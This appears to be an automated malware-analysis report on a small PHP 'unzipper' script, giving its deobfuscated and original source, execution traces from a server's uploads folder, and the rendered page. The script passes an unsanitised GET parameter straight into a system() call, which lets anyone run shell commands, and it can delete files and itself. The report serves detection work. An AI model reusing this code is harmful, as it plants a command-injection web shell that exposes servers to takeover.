unzipper.php, unzipper.phtml

md5: 72c147f5023d43607262134a3559ba92

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Execution
system (Deobfuscated, Original)

Input
_GET (Deobfuscated, Original)

Title
Billy's Unzipper Script (Deobfuscated, HTML, Original)

URLs
http://validator.w3.org/check?uri=referer (Deobfuscated, HTML, Original)
http://www.w3.org/1999/xhtml (Deobfuscated, HTML, Original)
http://www.w3.org/Icons/valid-xhtml10 (Deobfuscated, HTML, Original)
http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd (Deobfuscated, Original)

Deobfuscated PHP code
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-UK">
	<head>
		<title>Billy's Unzipper Script</title>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
		<meta name="generator" content="thekid" />
		<meta name='robots' content='noindex,nofollow' />
	</head>
	<body>
		<?php 
$file = $_GET['file'];
$removeorig = $_GET['removeorig'];
$unzipper = $_GET['unzipper'];
if (isset($file)) {
    echo "Unzipping " . $file . "...<br />\n";
    system('unzip -o ' . $file);
    echo "<hr />\n";
    if (isset($removeorig)) {
        echo "Deleting Zip...<br />\n";
        unlink("{$file}");
    }
}
if (isset($unzipper)) {
    echo "Deleting Script...<br />\n";
    unlink("/var/www/html/unzipper.php.715901cfb7679c22f57a45e8b37d6289.bin");
    echo "Script Deleted!<br /><a href=\"/\">HOME</a>\n";
    exit;
}
$handler = opendir(".");
echo "Please choose a file to unzip: <br />\n";
echo "<form action=\"\" method=\"get\">\n";
$found = 0;
while ($file = readdir($handler)) {
    if (strrchr($file, ".zip") != ".zip") {
        continue;
    }
    echo '<input type="radio" name="file" value="' . $file . '"/> ' . $file . "<br />\n";
    $found = 1;
}
echo "<hr/><input type=\"checkbox\" name=\"removeorig\" value=\"Remove\" />Delete .zip after extraction?<br />\n";
echo "<input type=\"checkbox\" name=\"unzipper\" value=\"Remove\" checked=\"checked\" />Delete Unzipper Script? (Uncheck this box if you have more files to unzip!)<br />\n";
closedir($handler);
if ($found == FALSE) {
    echo "No .zips found<br />";
} else {
    echo "<br />NOTE: This unzips and <strong>REPLACES</strong> files.<br /><br /><input type=\"submit\" value=\"Unzip!\" />";
}
echo "\n</form>";
?>
		<p><a href="http://validator.w3.org/check?uri=referer"><img src="http://www.w3.org/Icons/valid-xhtml10" alt="Valid XHTML 1.0 Transitional" height="31" width="88" /></a></p>
	</body>
</html>
Execution traces
data/traces/72c147f5023d43607262134a3559ba92_trace-1676241548.2028.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:39:34.100662]
1	0	1	0.000172	393528
1	3	0	0.000265	401072	{main}	1		/var/www/html/uploads/unzipper.phtml	0	0
1		A						/var/www/html/uploads/unzipper.phtml	11	$file = NULL
1		A						/var/www/html/uploads/unzipper.phtml	12	$removeorig = NULL
1		A						/var/www/html/uploads/unzipper.phtml	13	$unzipper = NULL
2	4	0	0.000350	401072	opendir	0		/var/www/html/uploads/unzipper.phtml	30	1	'.'
2	4	1	0.000371	401464
2	4	R			resource(4) of type (stream)
1		A						/var/www/html/uploads/unzipper.phtml	30	$handler = resource(4) of type (stream)
1		A						/var/www/html/uploads/unzipper.phtml	33	$found = 0
2	5	0	0.000412	401432	readdir	0		/var/www/html/uploads/unzipper.phtml	34	1	resource(4) of type (stream)
2	5	1	0.000432	401504
2	5	R			'..'
1		A						/var/www/html/uploads/unzipper.phtml	34	$file = '..'
2	6	0	0.000457	401464	strrchr	0		/var/www/html/uploads/unzipper.phtml	36	2	'..'	'.zip'
2	6	1	0.000471	401568
2	6	R			'.'
2	7	0	0.000485	401464	readdir	0		/var/www/html/uploads/unzipper.phtml	34	1	resource(4) of type (stream)
2	7	1	0.000498	401536
2	7	R			'.'
1		A						/var/www/html/uploads/unzipper.phtml	34	$file = '.'
2	8	0	0.000521	401464	strrchr	0		/var/www/html/uploads/unzipper.phtml	36	2	'.'	'.zip'
2	8	1	0.000534	401568
2	8	R			'.'
2	9	0	0.000547	401464	readdir	0		/var/www/html/uploads/unzipper.phtml	34	1	resource(4) of type (stream)
2	9	1	0.000560	401544
2	9	R			'prepend.php'
1		A						/var/www/html/uploads/unzipper.phtml	34	$file = 'prepend.php'
2	10	0	0.000584	401472	strrchr	0		/var/www/html/uploads/unzipper.phtml	36	2	'prepend.php'	'.zip'
2	10	1	0.000598	401576
2	10	R			'.php'
2	11	0	0.000611	401472	readdir	0		/var/www/html/uploads/unzipper.phtml	34	1	resource(4) of type (stream)
2	11	1	0.000624	401544
2	11	R			'data'
1		A						/var/www/html/uploads/unzipper.phtml	34	$file = 'data'
2	12	0	0.000647	401464	strrchr	0		/var/www/html/uploads/unzipper.phtml	36	2	'data'	'.zip'
2	12	1	0.000659	401536
2	12	R			FALSE
2	13	0	0.000672	401464	readdir	0		/var/www/html/uploads/unzipper.phtml	34	1	resource(4) of type (stream)
2	13	1	0.000685	401544
2	13	R			'.htaccess'
1		A						/var/www/html/uploads/unzipper.phtml	34	$file = '.htaccess'
2	14	0	0.000709	401472	strrchr	0		/var/www/html/uploads/unzipper.phtml	36	2	'.htaccess'	'.zip'
2	14	1	0.000722	401584
2	14	R			'.htaccess'
2	15	0	0.000736	401472	readdir	0		/var/www/html/uploads/unzipper.phtml	34	1	resource(4) of type (stream)
2	15	1	0.000749	401552
2	15	R			'unzipper.phtml'
1		A						/var/www/html/uploads/unzipper.phtml	34	$file = 'unzipper.phtml'
2	16	0	0.000773	401472	strrchr	0		/var/www/html/uploads/unzipper.phtml	36	2	'unzipper.phtml'	'.zip'
2	16	1	0.000787	401576
2	16	R			'.phtml'
2	17	0	0.000800	401472	readdir	0		/var/www/html/uploads/unzipper.phtml	34	1	resource(4) of type (stream)
2	17	1	0.000814	401512
2	17	R			FALSE
1		A						/var/www/html/uploads/unzipper.phtml	34	$file = FALSE
2	18	0	0.000837	401432	closedir	0		/var/www/html/uploads/unzipper.phtml	44	1	resource(4) of type (stream)
2	18	1	0.000852	401248
2	18	R			NULL
1	3	1	0.000867	401208
			0.000892	314416
TRACE END   [2023-02-12 20:39:34.101411]

data/traces/72c147f5023d43607262134a3559ba92_trace-1676262974.2249.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:36:40.122787]
1	0	1	0.000219	393528
1	3	0	0.000325	401072	{main}	1		/var/www/html/uploads/unzipper.php	0	0
1		A						/var/www/html/uploads/unzipper.php	11	$file = NULL
1		A						/var/www/html/uploads/unzipper.php	12	$removeorig = NULL
1		A						/var/www/html/uploads/unzipper.php	13	$unzipper = NULL
2	4	0	0.000414	401072	opendir	0		/var/www/html/uploads/unzipper.php	30	1	'.'
2	4	1	0.000438	401464
2	4	R			resource(4) of type (stream)
1		A						/var/www/html/uploads/unzipper.php	30	$handler = resource(4) of type (stream)
1		A						/var/www/html/uploads/unzipper.php	33	$found = 0
2	5	0	0.000479	401432	readdir	0		/var/www/html/uploads/unzipper.php	34	1	resource(4) of type (stream)
2	5	1	0.000501	401512
2	5	R			'unzipper.php'
1		A						/var/www/html/uploads/unzipper.php	34	$file = 'unzipper.php'
2	6	0	0.000528	401472	strrchr	0		/var/www/html/uploads/unzipper.php	36	2	'unzipper.php'	'.zip'
2	6	1	0.000543	401576
2	6	R			'.php'
2	7	0	0.000558	401472	readdir	0		/var/www/html/uploads/unzipper.php	34	1	resource(4) of type (stream)
2	7	1	0.000572	401544
2	7	R			'..'
1		A						/var/www/html/uploads/unzipper.php	34	$file = '..'
2	8	0	0.000596	401464	strrchr	0		/var/www/html/uploads/unzipper.php	36	2	'..'	'.zip'
2	8	1	0.000610	401568
2	8	R			'.'
2	9	0	0.000622	401464	readdir	0		/var/www/html/uploads/unzipper.php	34	1	resource(4) of type (stream)
2	9	1	0.000636	401536
2	9	R			'.'
1		A						/var/www/html/uploads/unzipper.php	34	$file = '.'
2	10	0	0.000659	401464	strrchr	0		/var/www/html/uploads/unzipper.php	36	2	'.'	'.zip'
2	10	1	0.000673	401568
2	10	R			'.'
2	11	0	0.000686	401464	readdir	0		/var/www/html/uploads/unzipper.php	34	1	resource(4) of type (stream)
2	11	1	0.000700	401544
2	11	R			'prepend.php'
1		A						/var/www/html/uploads/unzipper.php	34	$file = 'prepend.php'
2	12	0	0.000725	401472	strrchr	0		/var/www/html/uploads/unzipper.php	36	2	'prepend.php'	'.zip'
2	12	1	0.000738	401576
2	12	R			'.php'
2	13	0	0.000752	401472	readdir	0		/var/www/html/uploads/unzipper.php	34	1	resource(4) of type (stream)
2	13	1	0.000765	401544
2	13	R			'data'
1		A						/var/www/html/uploads/unzipper.php	34	$file = 'data'
2	14	0	0.000788	401464	strrchr	0		/var/www/html/uploads/unzipper.php	36	2	'data'	'.zip'
2	14	1	0.000802	401536
2	14	R			FALSE
2	15	0	0.000816	401464	readdir	0		/var/www/html/uploads/unzipper.php	34	1	resource(4) of type (stream)
2	15	1	0.000829	401544
2	15	R			'.htaccess'
1		A						/var/www/html/uploads/unzipper.php	34	$file = '.htaccess'
2	16	0	0.000853	401472	strrchr	0		/var/www/html/uploads/unzipper.php	36	2	'.htaccess'	'.zip'
2	16	1	0.000866	401584
2	16	R			'.htaccess'
2	17	0	0.000880	401472	readdir	0		/var/www/html/uploads/unzipper.php	34	1	resource(4) of type (stream)
2	17	1	0.000894	401512
2	17	R			FALSE
1		A						/var/www/html/uploads/unzipper.php	34	$file = FALSE
2	18	0	0.000918	401432	closedir	0		/var/www/html/uploads/unzipper.php	44	1	resource(4) of type (stream)
2	18	1	0.000934	401248
2	18	R			NULL
1	3	1	0.000948	401208
			0.000978	314416
TRACE END   [2023-02-13 02:36:40.123590]

Generated HTML code
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-UK"><head>
		<title>Billy's Unzipper Script</title>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<meta name="generator" content="thekid">
		<meta name="robots" content="noindex,nofollow">
	</head>
	<body>
		Please choose a file to unzip: <br>
<form action="" method="get">
<hr><input type="checkbox" name="removeorig" value="Remove">Delete .zip after extraction?<br>
<input type="checkbox" name="unzipper" value="Remove" checked="checked">Delete Unzipper Script? (Uncheck this box if you have more files to unzip!)<br>
No .zips found<br>
</form>		<p><a href="http://validator.w3.org/check?uri=referer"><img src="http://www.w3.org/Icons/valid-xhtml10" alt="Valid XHTML 1.0 Transitional" height="31" width="88"></a></p>
	

</body></html>
Original PHP code
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-UK">
	<head>
		<title>Billy's Unzipper Script</title>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
		<meta name="generator" content="thekid" />
		<meta name='robots' content='noindex,nofollow' />
	</head>
	<body>
		<?php
			$file = $_GET['file'];
			$removeorig = $_GET['removeorig'];
			$unzipper = $_GET['unzipper'];
			if (isset($file))
			{
				echo "Unzipping " . $file . "...<br />\n";
				system('unzip -o ' . $file);
				echo "<hr />\n";
			   	if (isset($removeorig)) {
					echo "Deleting Zip...<br />\n";
					unlink("$file");
				}
			}
			if (isset($unzipper)) {
				echo "Deleting Script...<br />\n";
				unlink(__FILE__);
				echo "Script Deleted!<br /><a href=\"/\">HOME</a>\n";
				exit;
			}
			$handler = opendir(".");
			echo "Please choose a file to unzip: <br />\n";
			echo '<form action="" method="get">'."\n";
			$found = 0;
			while ($file = readdir($handler))
			{
	       			 if(strrchr($file,".zip") != ".zip" ) { continue; }
				{
					echo '<input type="radio" name="file" value="' . $file . '"/> ' . $file . "<br />\n";
					$found = 1;
				}
			}
			echo '<hr/><input type="checkbox" name="removeorig" value="Remove" />Delete .zip after extraction?'."<br />\n";
			echo '<input type="checkbox" name="unzipper" value="Remove" checked="checked" />Delete Unzipper Script? (Uncheck this box if you have more files to unzip!)'."<br />\n";
			closedir($handler);
			if ($found == FALSE)
				echo "No .zips found<br />";
			else
				echo '<br />NOTE: This unzips and <strong>REPLACES</strong> files.<br /><br /><input type="submit" value="Unzip!" />';
		
			echo "\n</form>";
		?>
		<p><a href="http://validator.w3.org/check?uri=referer"><img src="http://www.w3.org/Icons/valid-xhtml10" alt="Valid XHTML 1.0 Transitional" height="31" width="88" /></a></p>
	</body>
</html>
PHP Malware Analysis

unzipper.php, unzipper.phtml

md5: 72c147f5023d43607262134a3559ba92

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
